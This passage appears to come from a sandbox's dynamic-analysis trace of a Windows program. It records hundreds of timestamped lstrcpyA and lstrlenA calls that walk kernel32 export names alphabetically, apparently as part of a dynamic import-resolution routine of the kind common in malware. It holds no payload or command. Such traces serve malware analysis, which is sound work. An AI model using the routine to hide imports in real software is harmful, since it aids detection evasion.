lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.365] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.365] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.365] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.365] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.365] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.365] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.365] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.365] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.365] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.365] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.366] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.366] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.366] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.366] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.366] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.366] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.366] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.366] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.366] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.366] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.366] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.366] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.366] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.366] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.366] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.366] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.366] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.366] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.367] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.367] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.367] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.367] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.367] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.367] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.367] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.367] lstrlenA (lpString="BEEP") returned 4 [0082.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.367] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.367] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.367] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.367] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.367] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.367] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.367] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.367] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.367] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.367] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.367] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.367] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.368] lstrlenA (lpString="CANCELIO") returned 8 [0082.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.368] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.368] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.368] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.368] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.368] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.368] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.368] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.368] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.368] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.368] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.368] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.368] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.368] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.368] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.368] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.368] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.368] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.368] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.369] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.369] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.369] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.369] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.369] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.369] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.369] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.369] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.369] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.369] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.369] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.369] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.369] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.369] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.369] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.369] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.369] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.369] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.370] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.370] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.370] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.370] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.370] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.370] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.370] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.370] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.370] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.370] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.370] lstrlenA (lpString="COPYFILEA") returned 9 [0082.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.370] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.370] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.370] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.370] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.370] lstrlenA (lpString="COPYFILEW") returned 9 [0082.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.370] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.370] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.370] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.371] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.371] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.371] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.371] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.371] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.371] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.371] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.371] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.371] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.371] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.371] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.371] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.371] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.371] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.371] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.371] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.371] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.371] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.372] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.372] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.372] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.372] lstrlenA 